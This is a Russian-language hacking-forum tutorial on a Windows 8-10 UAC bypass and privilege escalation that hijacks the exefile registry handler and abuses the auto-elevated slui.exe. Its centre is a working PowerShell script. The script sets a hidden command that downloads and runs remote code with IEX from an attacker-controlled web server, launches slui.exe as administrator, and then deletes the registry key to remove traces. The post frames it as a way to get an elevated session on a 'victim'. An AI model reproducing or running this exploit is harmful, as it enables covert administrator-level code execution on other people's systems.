Windows LPE (Local Privilege Escalation [Bypas UAC 2018 slui.exe method] )

Windows LPE (Local Privilege Escalation [Bypas UAC 2018 slui.exe method] )

@webware

t.me/webware

Всем доброго времени суток колеги.

Сегодня речь пойдет об относительно новом способе обхода User Account Control (UAC) и способе (LPE) - поднятия привилегий в системе Windows 8-10 x64 и x86 системах.

PS: Пишу сразу на двух форумах по этому :

CopyRights: <<<MisterBert0ni aka DarkNode>>>


СОДЕРЖАНИЕ СТАТЬИ:

  • Описания работы эксплоита
  • Демонстрация работы эксплоита
  • Вспомним про Web Delivery через PowerShell
  • Вспомним про RegSVR способ подгрузки
  • Похожие эксплоиты


Exploit Info:

Имя: Slui File Handler Hijak LPE

Дата публикации: 15.01.2018

Целевая ОС: Microsoft Windows

Патч: НЕТУ

Уязвимые версии: Windows 8-10 (x64 и x86)

Ссылка на сам експлоит

ПРИНЦИП РАБОТЫ ЭКСПЛОЙТА:


В операционной системе Windows версии 8-10 был обнаружен бинарный файл slui.exe - который является auto-elevated приложением ,так сказать - самоповышаемым.

Это дает возможность использовать обработчик файловых асоциаций для хайджекинга в привилегированый процес.


Простыми словамя говоря:

Мы создаем в реестре Windows запись , которая скажет что при открытии всех *.EXE файлов - будет выполнятся наша команда или вредоносный файл, после чего запускаем slui.exe , соотведственно вместо slui.exe запустится наш пейлоад от имени администратора.


Для того что бы понять как это работает давайте приступи к практической части:

1) Допустим у нас сессия без повышеных привилегий

2)Соотведственно, для того что бы все это вручную не писать , давайте подготим простой скрипт для PowerShell:

#Out Command | Наш пейлоад в моем случае вектор Web Delivery
$command = "powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://192.168.1.79/')"


#Create Registry KEY | Создаем ключ в реестре для асоциации бинарных файлов и прописываем действие обработчику EXE файлов:

New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force

#Start slui.exe as Admin | Запускаем от имени админа
Start-Process "C:\Windows\System32\slui.exe" -Verb runas


#Remove registry structure | Удаляем асоциацию файлов
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force

В качестве вектора атаки я использовал Web Delivery , более подробно о нем я писал ранее в своей статье.

Так же имеет место быть вектор через regsvr32 , и огромное смасибо нашему колеге @gushmazuko за то что написал говотый скрипт на PowerShell для работы с этим

вектором , готовый скрипт вы можете взять на его странице гитхаба


3)После того как мы набросали список действий в наш скрипт - ложим где то на вебсервер ( в моем случае в условиях учебной практике - это локальная машина )

И запускаем на стороне жертвы тем же Web Delivery методом в моем случае:

4) Ловим сессию с повышеными привилегиями

Благодарность : @gushmazuko 

Всем спасибо) Свами был DarkNode

Работа regsvr32 вектора покажу в видео)


Источник codeby.net

Report Page